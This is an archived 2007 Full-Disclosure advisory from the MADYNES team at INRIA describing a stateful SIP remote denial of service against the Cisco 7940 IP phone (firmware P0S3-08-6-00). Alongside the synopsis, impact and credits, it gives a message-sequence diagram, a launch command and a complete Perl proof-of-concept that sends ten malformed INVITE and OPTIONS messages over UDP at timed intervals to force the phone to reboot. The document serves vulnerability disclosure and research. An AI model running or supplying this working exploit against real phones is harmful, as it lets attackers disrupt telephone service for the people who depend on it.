OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
[Full-disclosure] 10 messages SIP Remote DOS on Cisco 7940 SIP Phone

From: Radu State (Radu.Stateloria.fr)
Date: Mon Aug 20 2007 - 09:04:05 CDT


MADYNES Security Advisory : stateful SIP remote DOS on Cisco 7940

Date of Discovery 4 April, 2007

ID: KIPH6

Synopsis

After sending a series of ten SIP messages the device reboots. The phone
does not check properly the state engine in the SIP stack
The vendor was informed in April 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
vulnerabilities published where advanced state tracking is required.

Background

* SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session.

Affected devices: Cisco phone 7940 (maybe other also) running firmware
P0S3-08-6-00

 

Impact :
A malicious user can remotely crash and perform a denial of service attack
by sending ten crafted SIP messages.

Resolution
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations.

Credits

* Humberto J. Abdelnur (Ph.D Student)
* Radu State (Ph.D)
* Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH

 

Configuration of our device:

* Current Firmware : P0S3-08-6-00
* IP-Address obtained by DHCP as 192.168.1.8
* User Name: 7940-3

 

 

 

Vulnerability:

It is based in a sequence of 10 messages, any of the particular messages
may do any harm by itself, but all of them turn the device in an
inconsistent state. The sequence is like:

X ------------------------- INVITE -----------------------> Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK ------------------------- Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK ------------------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X ------------------------- INVITE -----------------------> Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------- 404 Not Found ------------------ Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X <--------------- 400 Bad Request --------------- Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK ------------------------- Cisco

X ------------------------- INVITE -----------------------> Cisco

X <----------------100 Trying ------------------------- Cisco

X <--------------- 404 Not Found ------------------ Cisco

X <--------------- 404 Not Found ------------------ Cisco

X <--------------- 404 Not Found ------------------ Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK ------------------------- Cisco

X <--------------- 404 Not Found ------------------ Cisco

X ------------------------- OPTIONS--------------------> Cisco

X <--------------------- 200 OK ------------------------- Cisco

X <--------------- 404 Not Found ------------------ Cisco

...

 

And the device reboots after a few seconds.

 

Exploit:

 

To run the exploit the file stateful-cisco-8.6.pl should be launched
(assuming our configurations) as:

 

perl stateful-cisco-8.6-v2.pl 192.168.1.8 5060 7940-3 192.168.1.2

 

It approximatively takes less than 2 minutes to reboot the device after the
script is launched.

The script is simple and does not check if which messages are received, but
just wait some time before send the next one.

 

 

 

POC Code

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst-address> <dst-port> <dst_username> <src-address>" unless
($ARGV[3]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

 

$msg = "INVITE sip:$ARGV[2]\$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];branch=01;rport\r\nFrom: <sip:tucu\$ARGV[3]>;tag=01\r\nTo:
<sip:$ARGV[2]\invalidURL>\r\nCall-ID: 01\$ARGV[3]\r\nCSeq: 7532
INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL,
REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length:
215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN
IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0
PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101
0-16\r\na=silenceSupp:off - - - -\r\n";

$socket->send($msg);

 

sleep(8.2);

$msg = "OPTIONS sip:$ARGV[2]\$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:$ARGV[2]\$ARGV[0]>\r\nFrom: <sip:tucu\$ARGV[3]>;tag=02\r\nCall-ID:
02\$ARGV[3]\r\nCSeq: 79 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(1.5);

$msg = "OPTIONS sip:$ARGV[2]\$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:$ARGV[2]\$ARGV[0]>\r\nFrom: <sip:tucu\$ARGV[3]>;tag=03\r\nCall-ID:
01\$ARGV[3]\r\nCSeq: 15853 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(3.3);

$msg = "INVITE sip:$ARGV[2]\$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:$ARGV[2]\$ARGV[0]>\r\nFrom: <sip:tucu\$ARGV[3]>;tag=04\r\nCall-ID:
04\$ARGV[3]\r\nCSeq: 36688 INVITE\r\nContent-Type:
application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY,
NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent:
Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253
1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0
0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98
speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0
PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101
telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n";

$socket->send($msg);

 

sleep(4);

$msg = "OPTIONS sip:$ARGV[2]\invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:$ARGV[2]\invalidURL>\r\nFrom: <sip:tucu\$ARGV[3]>;tag=01\r\nCall-ID:
01\$ARGV[3]\r\nCSeq: 21013 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(4);

$msg = "OPTIONS sip:$ARGV[2]\invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:$ARGV[2]\invalidURL>\r\nFrom: <sip:tucu\$ARGV[3]>;tag=01\r\nCall-ID:
01\$ARGV[3]\r\nCSeq: 18031 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(12);

$msg = "OPTIONS sip:$ARGV[2]\$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:$ARGV[2]\$ARGV[0]>\r\nFrom: <sip:tucu\$ARGV[3]>;tag=07\r\nCall-ID:
07\$ARGV[3]\r\nCSeq: 41664 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(3);

$msg = "INVITE sip:invaliduser\$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];branch=02;rport\r\nFrom: <sip:tucu\$ARGV[3]>;tag=08\r\nTo:
<sip:7440-2\$ARGV[0]>\r\nContact: <sip:tucu\$ARGV[3]>\r\nCall-ID:
08\$ARGV[3]\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE,
ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type:
application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4
192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024
RTP/AVP 0 3 8 97 101\r\na=rtpmap:0
PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97
spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101
0-16\r\na=silenceSupp:off - - - -\r\n";

$socket->send($msg);

 

sleep(3);

$msg = "OPTIONS sip:$ARGV[2]\$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:$ARGV[2]\$ARGV[0]>\r\nFrom: <sip:tucu\$ARGV[3]>;tag=09\r\nCall-ID:
09\$ARGV[3]\r\nCSeq: 18883 OPTIONS\r\nAccept:
application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(3);

$msg = "OPTIONS sip:$ARGV[2]\$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
$ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo:
<sip:$ARGV[2]\$ARGV[0]>\r\nFrom: <sip:tucu\$ARGV[3]>;tag=10\r\nCall-ID:
10\$ARGV[3]\r\nCSeq: 6298 OPTIONS\r\nAccept:
application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

 

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/